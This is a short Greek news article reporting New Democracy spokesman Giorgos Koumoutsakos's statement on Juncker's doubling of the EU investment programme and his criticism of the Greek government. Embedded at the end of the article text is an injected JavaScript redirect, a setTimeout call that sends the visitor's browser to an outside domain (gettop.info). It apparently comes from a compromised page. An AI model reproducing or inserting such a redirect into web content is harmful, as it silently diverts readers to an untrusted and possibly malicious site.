ΝΔ: Γιατί πανηγυρίζουν στην κυβέρνηση με τις δηλώσεις Γιούνκερ;

0
10

 

«Ως ένα σημαντικό βήμα προς τη σωστή κατεύθυνση που έχει ανάγκη η ευρωπαϊκή οικονομία και οι ευρωπαϊκοί λαοί», χαρακτηρίζει η ΝΔ τις αποφάσεις του προέδρου της Ευρωπαϊκής Επιτροπής, Ζαν Κλοντ Γιούνκερ, για διπλασιασμό του προγράμματος επενδύσεων.
Στην ίδια ανακοίνωση ο εκπρόσωπος Τύπου της ΝΔ Γιώργος Κουμουτσάκος, επισημαίνει πως δεν κατανοεί τους πανηγυρισμούς της κυβέρνησης, «μιας κυβέρνησης που μέχρι τώρα, λόγω ιδεοληψίας και ανικανότητας, έχει χάσει κάθε προσφερόμενη ευρωπαϊκή ευκαιρία».

Στη δήλωσή του, ο Γιώργος Κουμουτσάκος, υπογραμμίζει πως «το παρελθόν της αποτυχίας της (σ.σ. της κυβέρνησης) είναι πρόκριμα για την αδυναμία της να αξιοποιήσει και τις νέες ευκαιρίες που παρουσιάζονται» και την καλεί να «καταλάβει ότι είναι άλλο η προπαγάνδα και άλλο η άσκηση αποτελεσματικής πολιτικής».

Σύμφωνα με τον κ. Κουμουτσάκο, «εδώ και καιρό, ήταν γνωστό ότι ο πρόεδρος της Ευρωπαϊκής Επιτροπής κ. Ζαν Κλοντ Γιούνκερ προετοίμαζε και είχε πάρει την απόφαση να προχωρήσει στην ανακοίνωση της σειράς των θετικών προτάσεων, που ανακοίνωσε στην Ολομέλεια του Ευρωπαϊκού Κοινοβουλίου». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here